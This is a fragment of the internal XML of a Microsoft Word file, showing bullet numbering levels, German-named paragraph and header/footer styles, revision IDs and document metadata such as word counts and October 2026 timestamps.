      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FC500E5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6C94FF02">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="699741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310"/>
    <w:rsid w:val="00124E10"/>
    <w:rsid w:val="004625F6"/>
    <w:rsid w:val="00472E1A"/>
    <w:rsid w:val="005150F8"/>
    <w:rsid w:val="005244C1"/>
    <w:rsid w:val="00530310"/>
    <w:rsid w:val="0053372F"/>
    <w:rsid w:val="005F751E"/>
    <w:rsid w:val="0076531B"/>
    <w:rsid w:val="007D44CE"/>
    <w:rsid w:val="00822C85"/>
    <w:rsid w:val="008B14E0"/>
    <w:rsid w:val="00965917"/>
    <w:rsid w:val="00B37703"/>
    <w:rsid w:val="00B4271D"/>
    <w:rsid w:val="00C66B64"/>
    <w:rsid w:val="00DB1996"/>
    <w:rsid w:val="00DC1FF9"/>
    <w:rsid w:val="00E276B3"/>
    <w:rsid w:val="00E3474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E8891"/>
  <w15:docId w15:val="{43D1FCCA-C0CE-435D-9A78-61279035C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10" w:space="6" w:color="2E86AB"/>
      </w:pBdr>
      <w:spacing w:before="360" w:after="200"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0B1F3A"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="berschrift2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="280" w:after="140"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1E3A5F"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>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822C85"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Verzeichnis2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00822C85"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="210"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kopfzeile">
    <w:name w:val="header"/>
    <w:basedOn w:val="Standard"/>
    <w:link w:val="KopfzeileZchn"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008B14E0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KopfzeileZchn">
    <w:name w:val="Kopfzeile Zchn"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:link w:val="Kopfzeile"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008B14E0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Fuzeile">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Standard"/>
    <w:link w:val="FuzeileZchn"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008B14E0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FuzeileZchn">
    <w:name w:val="Fußzeile Zchn"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:link w:val="Fuzeile"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008B1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6376</Words>
  <Characters>40169</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>334</Lines>
  <Paragraphs>92</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>46453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Hany Dhannoon</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-19T08:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-19T09:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>